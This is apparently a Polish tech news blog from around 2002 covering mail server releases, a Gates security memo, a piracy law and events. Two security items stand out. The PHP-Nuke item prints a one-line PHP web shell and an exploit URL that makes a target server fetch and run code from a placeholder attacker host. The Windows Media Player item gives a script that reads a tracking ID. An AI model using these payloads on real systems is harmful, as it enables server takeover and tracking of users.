Jeden z najbardziej znanych w komputerowym swiatku Polakow, Michal Zalewski vel lcamtuf ma dzis urodziny. Wszystkiego najlepszego Michal.
Wszystkie posty
hoaxer
Już od wczorajszego dnia można pobrać kolejną i co najważniejsze, najnowszą wersję dość popularnego serwera pocztowego Postfix. Serwer ten otrzymał miano jednego z najlepszych serwerów pocztowych dostępnych na rynku dzięki prostocie, zarówno instalacji pakietów jak i jego konfiguracji.
Aktualna wersja przynosi naprawdę bardzo dużo zmian. Zatem wszystkich zainteresowanych odwołuję do listy zmian, natomiast sam kod źródłowy serwera można pobrać stąd (1.2 MB)
Jak wiadomo Ukraina do niedawna była jednym z największych eksporterów płyt kompaktowych najczęściej pirackich do państw Europy, sprzedając od 70 do 100 milionów sztuk rocznie.
Od listopada ubiegłego roku bezskutecznie Ukraiński parlament próbował przyjąć ustawę o zwalczaniu audiopiractwa. Udało się to dopiero teraz, zgodnie z przyjętą w czwartek ustawą, prawo produkowania płyt kompaktowych będą miały tylko te zakłady, które otrzymają licencję specjalnego organu. Przy tym, licencjonowany ma być zarówno eksport, jak i import płyt CD, a także surowców i sprzętu do produkcji. Co najważniejsze, przyjęta ustawa bez ograniczeń, zezwala ma przeprowadzanie kontroli w tych zakładach, jednak pod warunkiem poważnych podejrzeń o naruszeniach. W przypadku złamania prawa właściciel zakładu będzie musiał zapłacić karę przewyższającą o 200% wartość zarekwirowanego towaru.
Bill Gates stawia na bezpieczeństwo swoich produktów. Świadczyć o tym może opublikowany na łamach internetowego magazynu The Register list, wysłany 15 stycznia br. przez samego Billa Gatesa do pracowników Microsoftu. Z publikowanego listu wynika, że wszyscy programiści Microsoftu mają teraz skoncentrować się na zabezpieczeniach programów i poświęcać im więcej uwagi.
„Jeżeli staniemy przed wyborem, czy do jakiegoś programu dodać nowe funkcje, czy też rozwiązywać problemy bezpieczeństwa, wybrać musimy bezpieczeństwo”
Jak twierdzi sam Bill Gates, firma Microsoft chce dążyć do tego, że przetwarzanie danych będzie równie bezpieczne, dostępne i niezawodne jak np. telefonia czy zaopatrzenie w prąd i w wodę. Bezpieczeństwo produktów ma być czynnikiem decydującym o sukcesie lub porażce microsoftowskiej strategii .Net, sprowadzającej się do załatwiania jak największej liczby zakupów i spraw poprzez internet.
Orginalna treść listu wysłanego przez Billa Gatesa do swoich pracowników dostępna jest na łamach magazynu internetowego The Register
Richard Smith odkrył kolejny błąd w Windows Media Player, który pozwala na śledzenie zachowań i poczynań użytkownika przy pomocy cookies.
Błąd ten został nazwany przez samego Smitha jako „SuperCookie” i pomija ważniejsze zabezpieczenia jakie Microsoft wbudował w Internet Explorer 6 w ramach tzw. Platform for Privacy Preferences. Dzięki temu, każdy posiadacz witryny internetowej, może przy pomocy odpowiedniego kodu JavaScript pobierać numer seryjny Windows Media Player z komputera internauty i po nim go rozpoznawać.
<OBJECT classid=”clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95″ ID=WMP WIDTH=1 HEIGHT=1></OBJECT>
<script>
alert(document.WMP.ClientID);
</script>
Tips: W łatwy sposób można zabezpieczyć się przed tzw. śledzeniem. Wystarczy w Windows Media Player przejść do zakładki Tools > Options i odznaczyć opcje: Allow internet sites to uniquely identify your player po czym zatwierdzić zmianę.
Jak donosi serwis Securityfocus odkryta została luka w PHP-Nuke, umożliwiająca wykonywanie komend systemowych oraz uruchamianie jakiegokolwiek kodu PHP.
Luka wykorzystuje dyrektywę odnoszącą się do plików (index.php?file=file) w celu podsunięcia skryptowi adresu url (http://…) do strony, na której znajduje się wcześniej przygotowany kod PHP, który zostanje pobrany i wykonany przez atakowany serwer.
Jako przykład wykorzystany został skrypt PHP wykonujący dowolne polecenie shella (należy go umieścić na wcześniej przygotowanym koncie www):
<?php system($cmd); ?>
Aby wykonać na atakowanym serwerze polecenie „ls -al” z wykorzystaniem powyższego skryptu należy podać adres w następującej formie:
http://atakowany.serwis/index.php?
file=http://adres.przygotowanego.skryptu.php/skrypt.php&cmd=ls%20-al
Inne eksploity można tworzyć postępując analogicznie.
Tekst źródłowy i więcej informacji znajduje się pod adresem:
www.securityfocus.com/archive/1/250777
Już w najbliższą sobote, bo 19 stycznia, odbędą się kolejne wykłady krakowskiej Linux Akademii. Standardowo start o godzinie 17:00 w Akademii Ekonomicznej w Krakowie, ul. Rakowicka 27, Pawilon Sportowy, sala 9. Wykłady poprowadzi Krzysztof Leszczyński, który opowie o TeXu.
Podczas festiwalu filmowego Sundance Film Festival, reżyser Brian Flemmingm który brał udział w badaniach nad okolicznościami zamachu na Johna F. Kennedy’ego, przedstawił film pt. „Nothing So Strange” który przedstawia udany zamach na Billa Gatesa – prezesa Microsoftu.
Producent filmu – Brian Clark stwierdził, że film ten jest fikcją i nie jest zwrócony przeciwko Gatesowi. Do scenariusza potrzebna była po prostu jakaś znana postać a Bill Gates właśnie jest jedną z tych osób.
Fabuła filmu odbiła się szerokim echem nie tylko na festiwalu ale takżę w internecie, gdzie zabójstwo prezesa Microsoftu stało się główną osią kampanii marketingowej, do której należy m.in. witryna www.billgatesisdead.com.
Dostępna jest najnowsza wersja serwera pocztowego Sendmail 8.12.2. W nowej wersji, w porównaniu do poprzedniej (8.12.1), poprawiono działanie procesów potomnych i naprawiono problemy związane z funkcja setgid(), stat(), co poprawiło współprace z innymi systemami. Oprócz tego dodano nowy port dla HP MPE-ix.
Najnowszy pakiet Sendmail do pobrania stąd, natomiast pełna lista zmian znajduje się tutaj